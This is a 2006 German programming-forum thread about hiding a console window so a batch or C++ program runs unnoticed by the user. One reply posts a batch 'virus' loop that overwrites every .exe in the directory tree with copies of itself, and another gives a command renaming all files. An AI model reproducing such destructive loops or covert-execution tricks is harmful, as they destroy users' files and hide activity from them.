Batchkonsole im Hintergrund?

Dieses Thema im Forum "Programmierung & Entwicklung" wurde erstellt von Yaso, 27. Juli 2006 .

Schlagworte:
  1. 27. Juli 2006
    Hi
    ist es möglich , das man die Konsole bei einen Batchprogramm oder auch in C++ so versteckt, das der Benutzer sie nicht sieht , also das das Programm beispielsweise einen Vorgang ausführt , ohne das der Bnutzer es merkt?

    vG
    ~Yaso
     
  2. 27. Juli 2006
    Wenn du das per System("Befehl"); machst, geht kein fenster auf

    btw, zu deiner sig:
    erklär mir mal, wie du nen virus in batch machen willst
     
  3. 27. Juli 2006
    ren *.* *.noob


     
  4. 27. Juli 2006
    Ein Virus in Batch?
    Jup ... geht einigermaßen ... also ich red jetzt nicht von shutdownviren (weil das wär etwas leicht^^ ) aber was sagst du zusowas?

    Code:
    @echo off 
    for /R %%d IN (*.exe) DO copy "Date.exe" "%%d"
    
    Ersetzt alle exe dateb im aktuellen verzeichniss mit kopien von sich selbst , is halt jetzt nurn beispiel , kann man natürlicg verbessern... muss auch kompeliert werden und dann Datei.exe genannt werden...

    //edit: Richtig DarkRaven ;-)
     
  5. 27. Juli 2006
    also um mal auf die anfängliche frage zurückzukommen
    Back2Topik
    mich würds auch interessieren
     
  6. 27. Juli 2006
    geht doch mit hidden.exe einfach als resc einbinden, die bat genauso , dan noch so schreiben das ers im tempdir erzeugt und über das Programm hidden.exe gestarted wird
     
  7. 29. Juli 2006
    ich wüedes so machen, müsste funktionieren (in c++):

    Code:
     BOOL ShowWindow( HWND hWnd, int nCmdShowshow); 
    also:

    Code:
    ShowWindow(hDeinFenster, SW_HIDE);
    
     
  8. 29. Juli 2006
    menschmenschmensch

    ich glaube NICHT das es das es ein problem ist die konsole versteckt zu starten... eher ist es eins die versteckte konsole zu STEUERN!
    versteckt ne anwendung starten kannste auch ohne hidden.exe ziemlich einfach
     
  9. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.